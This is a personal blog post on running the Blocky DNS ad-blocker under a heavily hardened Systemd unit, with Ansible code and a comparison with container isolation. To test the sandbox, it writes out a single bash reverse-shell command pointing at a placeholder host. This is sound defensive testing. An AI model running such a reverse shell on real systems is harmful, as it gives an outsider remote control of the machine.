Loudwhisper

Blocky DNS, Systemd and nextDNS

It is a Friday evening (well, it was when I started writing...), I am home alone for a few hours, so I decided to put on some relaxing tunes and write down some notes/guides/info about my latest homelab project.

Introduction

I just want to give an overview of what I am going to discuss in this post, so that people who don't want to commit their time to reading it yet can decide whether it is interesting for them or not.

I want to talk mostly about two things:

For those who have already read this blog (maybe I should use the singular, since it seems there is one RSS subscriber!), you might remember that not long ago I wrote a post about container isolation, and specifically compared it to Systemd isolation. Since I keep a server with really minimal dependencies, I took the chance to make the deployment as hardened as I could using Systemd; all of this to say, I am going to talk about Systemd unit hardening as well.

DNS Ad-Blocking

It's 2023, almost 2024 to be precise, and connecting to the internet via a web browser essentially requires wearing a digital condom. Every webpage is filled with Ads, and most services we use, sometimes even the ones we pay for, collect data and aim to monetize user behavior. My LG TV shows me Ads on the homepage about movies I should buy on Amazon even though I don't have any Amazon apps installed, but everyone probably has their own favourite dystopian Ads anecdote.

In order to protect me and my family from tracking and advertising, there are a few things that I do:

The main difference between DNS Ad-blocking and "regular" Ad-blocking (e.g., the uBlock Origin plugin) is that the DNS one is simply more versatile. While the browser plugin works only for that particular browser, DNS blocking works for every device and service within my local network (LAN).

How does DNS Ad-blocking work

DNS Ad-blocking unsurprisingly uses a custom DNS server that employs a blocklist to pretend that certain domains cannot be resolved. In general, DNS is a service that translates (mnemonic) domain names into internet (IP) addresses. For example:

$ dig +short kagi.com
34.111.242.115

This command shows that if I enter kagi.com in my browser, this name is translated to 34.111.242.115, which is what machines understand. The address is ultimately what's needed to talk to services on the internet, while the name is just our human way to remember things.

However, what happens if I try to translate a domain that does not exist? Well, nothing. The DNS server will simply respond with the fact that it does not have an answer to give us, and if we do that in a web browser we might get an error such as Hmm. We’re having trouble finding that site. (this is what Firefox uses, at least).

Now imagine that instead of using a public DNS, you can use a private DNS, which will essentially do the following:

This is exactly how DNS Ad-blocking works. There are many maintained lists of hosts/domains used for advertising and tracking, which we can add to our blocklist. When any device inside our network tries to reach out to any one of those, the connection will "break" at the very first step, because our devices won't know which address to use for those names.
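As a rough illustration of the lookup described above, here is a minimal shell sketch. It assumes a hosts-format blocklist (lines such as "0.0.0.0 ads.example.com", the layout used by lists like StevenBlack's). The function names is_blocked and answer_query and the domain ads.example.com are made up for this example, and a real resolver does far more than this (caching, actual upstream forwarding, wildcard lists).

```shell
# is_blocked DOMAIN BLOCKLIST_FILE
# Succeeds (exit 0) if DOMAIN is listed in a hosts-format blocklist.
is_blocked() {
  awk -v d="$1" '
    /^[[:space:]]*#/ { next }                      # skip comment lines
    ($1 == "0.0.0.0" || $1 == "127.0.0.1") && $2 == d { found = 1 }
    END { exit (found ? 0 : 1) }
  ' "$2"
}

# answer_query DOMAIN BLOCKLIST_FILE
# Blocked names get a null address; everything else would go upstream.
answer_query() {
  if is_blocked "$1" "$2"; then
    echo "0.0.0.0"
  else
    echo "forward to upstream"   # placeholder: no real DNS query is made here
  fi
}

# Demo with a throwaway blocklist.
demo_list=$(mktemp)
printf '# demo blocklist\n0.0.0.0 ads.example.com\n' > "$demo_list"
answer_query ads.example.com "$demo_list"   # prints: 0.0.0.0
answer_query kagi.com "$demo_list"          # prints: forward to upstream
rm -f "$demo_list"
```

Answering with 0.0.0.0 rather than an error is just one possible way to "break" the lookup; it mirrors the zeroIp block type used in the configuration in Appendix A.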

Limitations of DNS Ad-blocking

As with every technical solution, DNS Ad-blocking has its limitations. In particular:

Final Remarks on Ad-blocking

Thankfully, Ad-blocking strategies are not in competition with each other: the more the merrier! You should run an Ad-blocker on every browser you use (PSA: Firefox for Android supports uBlock Origin), and if possible you should also use a DNS Ad-blocker, especially to protect those devices/services where you cannot install an Ad-blocker (e.g., certain mobile apps).

Running a DNS Ad-blocker

Having hopefully a clear idea of what DNS Ad-blocking is, let's see how we can run it.

Nowadays there are quite a few options to do this: some are effectively hands-off services, some are more DIY options. I am no expert, and this is not an exhaustive list, but the ones that immediately jump to my mind are:

I also very recently discovered a lesser-known tool, which I decided to employ:

PiHole is probably the best known (relatively speaking, I imagine this is still an extremely niche subject), but I don't like how by default it wants to "monopolize" a whole machine. I also don't need any web console and I want the maintenance for this to be low to non-existent: when you mess with your DNS, the whole local network explodes very quickly and everyone at home starts complaining :)

Before diving into the technical setup, a tl;dr: to run a DIY solution, you need some machine which is on 24/7 (a NAS, a Raspberry Pi, etc.); it can be very small, but it needs to run all the time. If you don't have one, you are better off using a service such as NextDNS.

Blocky Setup

One of the main selling points of Blocky for me is that it's written in Go. Go (like Rust) produces static binaries, which means the "installation" is essentially one file download. There is no need to fight with dependencies etc., which is something that I very much like as it supports my overall effort of reducing maintenance as much as possible.

In my case, I already had a machine which is running 24/7, where I was already running dnsmasq as DNS server for my internal network, but without Ad-blocking. My objectives for this project were the following:

Based on these requirements and on my previous rambling about container security, one would think that the no-brainer option would be to run a docker-compose file and be done in 20 minutes. However, I wanted to try first hand what it takes to achieve similar isolation using Systemd. This also accidentally allowed me to keep this machine more minimal, as I don't need (yet?) a container engine on it. Less software, fewer bugs, fewer CVEs, which is pretty nice for a machine that is also my VPN server to connect from outside home.

Automating Installation

To automate the installation and configuration I wrote an ansible playbook, which doesn't do anything crazy, and simply:

The Ansible code is in Appendix A below, in case you want to take inspiration from it. Please remember to adjust it to your needs: the code is written only for my own benefit, so it does not have all the parametrization you might need.

The playbook is idempotent (except for the download, which is done every time), which means it can be run multiple times without side-effects (use tags to limit the tasks to run).

I made some opinionated choices that you might not want or need:

If I start paying for the NextDNS membership (which I am still considering), I won't need the hacky double DNS part anymore. But for the moment, this is what I have.

Security and Systemd

A large portion of the setup time was spent on securing it as much as possible. Specifically, since this tool is still a small third party project, I wanted to sandbox it as much as possible, so that if the tool itself were compromised/backdoored, it would be able to do as little damage as possible.

⚠️ Note: Any software that is used to perform DNS is inherently in a privileged position to carry out certain attacks that potentially enable Man-in-the-middle attacks. Nowadays TLS and HSTS can protect us reasonably against many of these attacks, but a compromised DNS can still do damage, especially if you use HTTP in your local network!

The first step in securing the setup was to understand what this binary will realistically need:

These considerations mean that we should be able to allow very minimal privileges to the app, and then run it almost completely isolated.

We can start with a minimal Systemd unit, which covers the basics:

[Unit]
Description=Blocky service
After=network-online.target

[Service]
User=blocky
ExecStart=/opt/blocky/blocky --config /opt/blocky/config.yaml
Restart=always

[Install]
WantedBy=network-online.target

This unit will not work unless we specifically set the NET_BIND_SERVICE capability on the binary, since a low-privileged user cannot otherwise bind to port 53.

However, as I mentioned in the previous post, Systemd has many security options, which means we can increase the isolation and lower the blast radius in case this binary is backdoored.

A very nice way to check the security posture of a Systemd unit is to run the following:

systemd-analyze security $SYSTEMD_UNIT

This will give us a security "score" for a unit, along with hints covering basically all the security settings we can apply. Running it on our unit at the moment leads to a scary 9.2 UNSAFE!

The final list is the following, at least what I could come up with. I added a small comment to indicate what the option does, for more info there is the official documentation or some pages such as this one that talk about Systemd hardening specifically:

# Sets ambient capabilities to the NET_BIND_SERVICE
AmbientCapabilities=CAP_NET_BIND_SERVICE
# Sets the capabilities that a process can gain
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
# Allows only AF_INET sockets, no IPv6/unix sockets
RestrictAddressFamilies=AF_INET
# Restrict the creation of additional namespaces
RestrictNamespaces=yes
# Prevent child processes from having more privileges than their parent
NoNewPrivileges=yes
# Isolate /dev
PrivateDevices=yes
# Run the process in an isolated mount namespace
PrivateMounts=yes
# Provide the process with a separate set of tmp directories
PrivateTmp=yes
# Deny access to the hardware or system clock
ProtectClock=yes
# Prevents access (modifications) to cgroups hierarchies
ProtectControlGroups=yes
# Restrict access to /home, /root and /run/user
ProtectHome=yes
# Restrict access to Kernel logs
ProtectKernelLogs=yes
# Restrict access to load/unload kernel modules
ProtectKernelModules=yes
# Restrict access to sysctl kernel settings
ProtectKernelTunables=yes
# Hide processes which are not owned by the blocky user from /proc
ProtectProc=invisible
# Use read-only mounts for system directory to avoid tampering
ProtectSystem=strict
# Deny the ability to use AF_PACKET sockets - used to sniff network
RestrictAddressFamilies=~AF_PACKET
# Restrict the ability to gain real-time priority over other processes
RestrictRealtime=yes
# Restrict the ability to set SUID/SGID on files
RestrictSUIDSGID=yes
# Deny a bunch of syscall groups (this is implemented with seccomp). The ~ means "not".
SystemCallFilter=~@clock
SystemCallFilter=~@debug
SystemCallFilter=~@module
SystemCallFilter=~@mount
SystemCallFilter=~@reboot
SystemCallFilter=~@privileged
SystemCallFilter=~@swap
SystemCallFilter=~@cpu-emulation
SystemCallFilter=~@obsolete
# Restrict the ability to use NETLINK sockets
RestrictAddressFamilies=~AF_NETLINK
# This would essentially chroot the process to a specific path
# It can be enabled, but since the blocklists are downloaded over HTTPS,
# We will need to provide inside /opt/blocky a copy of the system ca-certificates
# sudo cp -r /etc/ssl/certs/ /opt/blocky/etc/ssl/
#RootDirectory=/opt/blocky
# Does not allow the process to change its personality - aka execution domain (see man 2 personality)
LockPersonality=yes
# Make memory pages nonexecutable
MemoryDenyWriteExecute=yes
# Clean up the IPC objects owned by the unit's user when the unit is stopped
RemoveIPC=yes
# Default umask for files created by this process
UMask=0077
# Restrict access to modify the hostname
ProtectHostname=yes
# Restrict access to syscalls for architectures which are not the system's default one
SystemCallArchitectures=native
# Hides all files not associated with process management from /proc
ProcSubset=pid

Obviously, many of these options may look redundant, given that our process runs with low privileges, but they are extremely helpful to prevent a privilege escalation, and to limit the damage in case one happens.

With the configuration above, systemd-analyze reports Overall exposure level for blocky.service: 1.5 OK 🙂.
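To keep that score from silently regressing after future edits to the unit, one option is a small check around the summary line. This is only a sketch: check_exposure is a hypothetical helper name, the 2.0 threshold is arbitrary, and the parsing assumes the summary line keeps the "Overall exposure level for UNIT: SCORE" shape quoted above.

```shell
# check_exposure MAX
# Reads `systemd-analyze security UNIT` output on stdin and succeeds only if
# the overall exposure score is <= MAX. Returns 2 if no score line is found.
check_exposure() {
  max_score=$1
  score=$(sed -n 's/.*Overall exposure level for [^:]*: \([0-9.][0-9.]*\).*/\1/p')
  [ -n "$score" ] || return 2
  # The shell has no floating point arithmetic, so awk does the comparison.
  awk -v s="$score" -v m="$max_score" 'BEGIN { exit ((s + 0 <= m + 0) ? 0 : 1) }'
}

# Demo on a captured summary line, so this runs even without systemd.
echo "Overall exposure level for blocky.service: 1.5 OK" | check_exposure 2.0 \
  && echo "exposure within threshold"
```

On the real machine the input would come from the tool itself, e.g. systemd-analyze security blocky.service | check_exposure 2.0.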

To have an idea of what a compromise of such a unit would look like, we can try creating an identical unit with a reverse shell, and see what we can do:

ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1'

Once we get the connection back, we can look around:

ls /proc
75954
82777
82778
82794
self
thread-self

The /proc directory is quite empty, which makes it hard to enumerate other processes and disclose ENV variables, for example.

ls /home
ls: cannot open directory '/home': Permission denied

No access to /home at all, no private SSH keys, history files, etc.

mount
/dev/mapper/dns--vg-root on / type ext4 (ro,relatime,errors=remount-ro)

The whole / is mounted as read-only, no changes to /etc and similar possible.

That said, we still have (read-only) access to the system binaries and we have a writeable /tmp.

cd /tmp && /usr/bin/wget loudwhisper.me

This is mostly because we did not use the RootDirectory option, which would definitely solve most of these problems. However, it comes with a bit of overhead. The process inside the unit won't have access to the system's CA certificates, and will also not have access to timezone files, for example. All of these need to be copied over (they cannot be symlinked), which means that when an update happens, the new data has to be copied again.

The careful reader will have noticed that these are exactly the things we usually take care of when we build a distroless image: a low-privileged user, CA certificates and timezone/locale files.
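A minimal sketch of that copy step could look like the following. The helper name populate_root is hypothetical, and the two directories (etc/ssl/certs for the CA certificates, usr/share/zoneinfo for timezone data) are the usual locations on Debian-like systems, so treat them as assumptions and adjust them to your distribution.

```shell
# populate_root SRC_ROOT DEST_ROOT
# Copies CA certificates and timezone data from SRC_ROOT into DEST_ROOT,
# dereferencing symlinks (-L) because links pointing outside the new root
# would dangle once RootDirectory= is in effect.
populate_root() {
  src_root=$1
  dest_root=$2
  for dir in etc/ssl/certs usr/share/zoneinfo; do
    [ -d "$src_root/$dir" ] || continue      # skip what this system lacks
    mkdir -p "$dest_root/$dir"
    cp -RL "$src_root/$dir/." "$dest_root/$dir/"
  done
}

# Demo against a throwaway tree, so nothing on the real system is touched.
demo=$(mktemp -d)
mkdir -p "$demo/src/etc/ssl/certs"
echo "dummy cert" > "$demo/src/etc/ssl/certs/ca-certificates.crt"
populate_root "$demo/src" "$demo/root"
ls "$demo/root/etc/ssl/certs"    # prints: ca-certificates.crt
rm -rf "$demo"
```

On the real host the call would be something like populate_root / /opt/blocky, run as root, and it would have to be repeated after every update of the CA certificates or timezone packages.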

Systemd vs containers

Despite the fact that I decided to go with Systemd for this particular use case, I can't but reiterate some points I already made in the previous post about container isolation. Specifically, the main point is about the ease with which isolation can be achieved. Systemd requires us to use some 40-50 different options. Possibly, if we want to really have the strongest isolation, it also requires us to manage the CA certificates and timezone files.

Let's look at what this same isolation would look like if we were to use a well built container image.

First of all, the default configuration using the "official" image already delivers most of the isolation we need. The image is built from scratch which means inside the image there is basically nothing (specifically, the blocky binary and the CA certificates).

The whole image is 22MB and using dive we can see that the final image contains literally two files:

Current Layer Contents
Permission     UID:GID       Size  Filetree
drwxr-xr-x     100:100      22 MB  ├── app
-rwxr-xr-x       100:0      22 MB  │   └── blocky
drwxr-xr-x         0:0     214 kB  └── etc
drwxr-xr-x         0:0     214 kB      └── ssl
drwxr-xr-x         0:0     214 kB          └── certs
-rw-r--r--         0:0     214 kB              └── ca-certificates.crt

Running the image with the default command as per the documentation would already get us in a position similar to what Systemd gives us.

docker run  -v /tmp/blocky-test/config.yaml:/app/config.yml -p 4000:4000 -p 53:53/udp spx01/blocky

However, the bounding set still contains all of Docker's default capabilities, which the process could potentially gain, and we want to prevent that:

cat /proc/68587/status | grep -i cap
CapInh: 00000000a80425fb
CapPrm: 0000000000000400
CapEff: 0000000000000400
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000

We can drop all capabilities except what we need:

docker run  --cap-drop=ALL --cap-add=NET_BIND_SERVICE --name blocky -v /tmp/blocky-test/config.yaml:/app/config.yml -p 9999:4000 -p 8053:53/udp spx01/blocky

Now the bounding set contains exclusively NET_BIND_SERVICE, which is what we want.

cat /proc/67881/status | grep -i cap
CapInh: 0000000000000400
CapPrm: 0000000000000400
CapEff: 0000000000000400
CapBnd: 0000000000000400
CapAmb: 0000000000000000
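Those hexadecimal values are bitmasks, where bit N being set means that capability number N is present. The sketch below decodes them with plain shell arithmetic. decode_caps is a name made up for this example, and the name table (following the kernel's capability numbering) only covers bits 0 to 31, which is enough for the masks shown here. If libcap's tools are installed, capsh --decode=MASK should give the same information.

```shell
# Capability names in bit order, bit 0 first (see linux/capability.h).
CAP_NAMES="chown dac_override dac_read_search fowner fsetid kill setgid setuid
setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw
ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct
sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease
audit_write audit_control setfcap"

# decode_caps HEXMASK
# Prints a comma-separated list of the capabilities set in HEXMASK.
decode_caps() {
  mask=$(( 0x$1 ))
  bit=0
  out=""
  for name in $CAP_NAMES; do
    if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then
      out="${out:+$out,}cap_$name"
    fi
    bit=$(( bit + 1 ))
  done
  echo "$out"
}

decode_caps 0000000000000400   # prints: cap_net_bind_service
decode_caps 00000000a80425fb   # the default bounding set seen earlier
```

The first mask has only bit 10 set, which is NET_BIND_SERVICE, while the second one expands to the 14 capabilities that were in the bounding set before dropping them.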

Technically, we could even drop this capability too, since we have docker (or Kubernetes) which can do the port mapping for us, allowing the application to bind on a high port.

At this point, with one command, we have full mount isolation, network isolation, process isolation (including /proc), chroot-like isolation with no host files available within the container (apart from the mounted configuration), no capabilities beyond NET_BIND_SERVICE, a low-privileged user and a default seccomp profile already applied.

The only difference is that in Systemd we probably block a few additional syscalls (which we could also do very simply by taking the default Docker seccomp profile and removing what we want), and we also limit the types of sockets the process can use. On the other hand, the container runs in a completely separate network namespace and it is the Docker engine that does the port-mapping for us, while this cannot be done with Systemd, since we need access to the host network to provide DNS service to other hosts! Well, technically the latter could be done using systemd-nspawn, which also uses a container.

To be clear, my point is that the end result is quite similar. Both setups, once hardened, are fairly hard to exploit and provide a good reduction to the blast radius if compromised. However, achieving this via containers is just trivial, a couple of command line flags and we are good to go, while in Systemd we need 40+ different options and potentially some more maintenance overhead.

Appendix A: Ansible Code

The playbook:

- hosts: all
  become: true
  tasks:
  - name: Installation | Create blocky user
    ansible.builtin.user:
      name: "{{ blocky.user }}"
      shell: /bin/false
      create_home: false
      system: true
      state: present
    tags: install

  - name: Configure | Create Blocky config path
    ansible.builtin.file:
        path: "{{ blocky.config_path }}"
        state: directory
        owner: "{{ blocky.user }}"
        mode: '0755'
    tags: install

  - name: Installation | Unpack binary
    unarchive:
      src: "https://github.com/0xERR0R/blocky/releases/download/{{ blocky.release }}/blocky_{{ blocky.release }}_Linux_x86_64.tar.gz"
      remote_src: yes
      dest: "{{ blocky.config_path }}"
      owner: "{{ blocky.user }}"
    tags: install

  - name: Installation | Cleanup release files
    file:  
        path: "{{blocky.config_path}}/{{ item }}"
        state: absent
    with_items: 
      - "README.md"
      - "LICENSE"
    tags: install

  - name: Installation | Add capability to blocky binary
    community.general.capabilities:
        path: "{{ blocky.config_path}}/blocky"
        capability: cap_net_bind_service+ep
        state: present

  - name: Configure | Create Blocky config 
    template:
        src: ../templates/blocky/blocky-config.yaml.j2
        dest: "{{ blocky.config_path }}/config.yaml"
        owner: "{{ blocky.user }}"
        mode: '0600'
    tags: configure

  - name: Configure | Create systemd unit
    template:
        src: ../templates/blocky/blocky.service.j2
        dest: /etc/systemd/system/blocky.service
        owner: root
        mode: '0600'
    tags: configure

  - name: Restart blocky
    systemd:
      name: blocky
      state: restarted
      daemon_reload: true

The config template ../templates/blocky/blocky-config.yaml.j2:

upstreams:
  groups:
    default:
# This allows me to configure different upstream DNSs for my internal
# network and the public IP of the router. My ISP-issued router makes
# 24 queries/minute for NTP servers, which wastes a lot of DNS request
# if you are using NextDNS free tier.
{% for dns in blocky.free_dns %}
      - {{ dns }}
{% endfor %}
    192.168.0.0/24:
{% for dns in blocky.upstream_dns %}
      - {{ dns }}
{% endfor %}
    172.16.0.0/16:
{% for dns in blocky.upstream_dns %}
      - {{ dns }}
{% endfor %}
    10.0.0.0/8:
{% for dns in blocky.upstream_dns %}
      - {{ dns }}
{% endfor %}
    127.0.0.0/8:
{% for dns in blocky.upstream_dns %}
      - {{ dns }}
{% endfor %}
  strategy: parallel_best
connectIPVersion: v4

customDNS:
  customTTL: 1h
  filterUnmappedTypes: true
  mapping:
{% for host, ip in blocky.local_hosts.items() %}
    {{ host }}: {{ ip }}
{% endfor %}

blocking:
  # definition of blacklist groups. Can be external link (http/https) or local file
  blackLists:
    blocked:
{% for blocklist in blocky.blocklists %}
      - {{ blocklist }}
{% endfor %}
  whiteLists:
    allowed:
      - |
{% for whitelist in blocky.whitelist_regexes %}
        {{ whitelist }}
{% endfor %}
  clientGroupsBlock:
    default:
      - blocked
  blockType: zeroIp
  blockTTL: 30m
prometheus:
  enable: true
  path: /metrics

ports:
  dns: 53
  http: {{ blocky.metrics_iface}}:{{ blocky.metrics_port }}

bootstrapDns:
{% for dns in blocky.upstream_dns %}
  - upstream: {{ dns }}
{% endfor %}

caching:
  minTime: 5m
  maxTime: 30m
  prefetching: true

log:
  level: warn
  format: text
  timestamp: true
  privacy: false

Obviously the above can be configured as you want.

The Systemd unit template ../templates/blocky/blocky.service.j2:

[Unit]
Description=Blocky service
After=network-online.target

[Service]
User={{ blocky.user }}
ExecStart={{ blocky.config_path}}/blocky --config {{ blocky.config_path }}/config.yaml
Restart=always
AmbientCapabilities=CAP_NET_BIND_SERVICE
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
RestrictAddressFamilies=AF_INET
RestrictNamespaces=yes
NoNewPrivileges=yes
PrivateDevices=yes
PrivateMounts=yes
PrivateTmp=yes
ProtectClock=yes
ProtectControlGroups=yes
ProtectHome=yes
ProtectKernelLogs=yes
ProtectKernelModules=yes
ProtectKernelTunables=yes
ProtectProc=invisible
ProtectSystem=strict
RestrictAddressFamilies=~AF_PACKET
RestrictRealtime=yes
RestrictSUIDSGID=yes
SystemCallFilter=~@clock
SystemCallFilter=~@debug
SystemCallFilter=~@module
SystemCallFilter=~@mount
SystemCallFilter=~@reboot
SystemCallFilter=~@privileged
SystemCallFilter=~@swap
SystemCallFilter=~@cpu-emulation
SystemCallFilter=~@obsolete
RestrictAddressFamilies=~AF_NETLINK
# This is commented because if using this, the local CA certificates
# need to be copied inside {{ blocky.config_path }} too.
#RootDirectory={{ blocky.config_path }}
LockPersonality=yes
MemoryDenyWriteExecute=yes
RemoveIPC=yes
UMask=0077
ProtectHostname=yes
SystemCallArchitectures=native
ProcSubset=pid

[Install]
WantedBy=network-online.target

As a reference, for the machine which hosts the DNS, I have the following inside host_vars/machine:

blocky:
  release: "v0.22"
  user: blocky
  config_path: /opt/blocky
  free_dns:
    # Quad9 IPs
    - 9.9.9.9
    - 149.112.112.112
  upstream_dns:
    - [NextDNS IP-redacted]
    - [NextDNS IP-redacted]
  blocklists:
    - https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts
    - https://s3.amazonaws.com/lists.disconnect.me/simple_ad.txt
    - https://s3.amazonaws.com/lists.disconnect.me/simple_tracking.txt
    - https://v.firebog.net/hosts/AdguardDNS.txt
    - https://big.oisd.nl/domainswild2
  whitelist_regexes:
    - "/^an.exception.com/"
  metrics_port: 4000
  metrics_iface: [IP-redacted]
  local_hosts:
    one.my.domain: [IP-redacted]
    another.my.domain: [IP-redacted]
    my.domain: [IP-redacted]

If you find an error, want to propose a correction, or you simply have any kind of comment and observation, feel free to reach out via email or via Mastodon.
